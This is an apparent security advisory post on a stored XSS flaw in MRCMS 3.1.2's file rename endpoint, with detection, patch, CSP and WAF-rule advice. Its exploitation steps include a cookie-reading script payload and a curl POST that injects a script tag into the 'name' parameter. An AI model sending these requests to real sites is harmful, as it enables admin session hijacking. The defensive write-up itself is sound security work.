How CVE-2025-2195 Works
The vulnerability exists in MRCMS 3.1.2 within the file /admin/file/rename.do, specifically in the `rename` function of org.marker.mushroom.controller.FileController. Attackers can inject malicious scripts via the `name` or `path` parameters due to improper input sanitization. When an admin views or interacts with manipulated filenames or paths, the script executes in their browser, leading to session hijacking, data theft, or admin account compromise. The attack is remotely exploitable with low privileges, requiring only user interaction (e.g., browsing files).
DailyCVE Form
Platform: MRCMS
Version: 3.1.2
Vulnerability: XSS
Severity: Medium
Date: 04/09/2025
What Undercode Say:
Exploitation:
- Craft a malicious filename or path with XSS payload:
<script>alert(document.cookie)</script>
2. Send a POST request to `/admin/file/rename.do`:
curl -X POST -d "name=<script>alert(1)</script>&path=malicious" http://target/admin/file/rename.do
3. Trigger execution when admin views the file list.
Detection:
Check logs for suspicious filenames:
grep -r "rename.do" /var/log/mrcms | grep -i "<script>"
Mitigation:
1. Patch by sanitizing inputs in `FileController`:
String sanitizedName = StringEscapeUtils.escapeHtml4(name);
2. Implement CSP headers:
add_header Content-Security-Policy "default-src 'self'";
3. WAF rule to block XSS patterns:
SecRule ARGS "@contains <script>" "id:1001,deny,status:403"
References:
Impact:
- Session hijacking
- Unauthorized admin actions
- Data exfiltration
Affected Configurations:
- MRCMS 3.1.2 with default `/admin` access.
Notes:
- Vendor unresponsive; use community patches.
- Prioritize patching in shared hosting.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2195
Extra Source Hub:
Undercode
